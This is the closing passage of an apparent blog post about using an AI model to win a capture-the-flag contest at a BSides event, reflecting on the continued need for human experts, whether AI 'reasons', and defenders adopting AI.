Three. We still need human experts. Yes — this CTF could have been completed by a user with zero cybersecurity knowledge plus the right AI. The real world is messier. AI doesn't find everything. It hallucinates problems that don't exist and misses ones that do. It struggles with systematic coverage at scale. You still need people who know the domain, who can navigate and control the AI, who can tell a real finding from a confabulation. The CTF was genuinely hard — to solve it without AI, you would need to be deeply experienced across half a dozen specializations. That kind of expertise is harder to acquire now, not easier. But that is what studying is for.

And one closing note for the people who still want to argue that what I described above isn't reasoning, just very sophisticated retrieval.

I can't disprove that position. Neither can you prove it. The internal mechanism is genuinely unsettled science. But there is a pragmatic test: if a system reliably produces the same outputs that reasoning would produce, on novel problems it has never seen, in domains that compose in unfamiliar ways, the distinction between "reasoning" and "indistinguishable from reasoning" stops mattering operationally. We pay engineers to ship working exploits, not to defend their epistemology.

The interesting question isn't whether AI can do this. It's whether your defenders are using AI as fluently as the attackers will be next year.

BSides trophy. A plush seal — coincidence with the AI's name was not lost on me.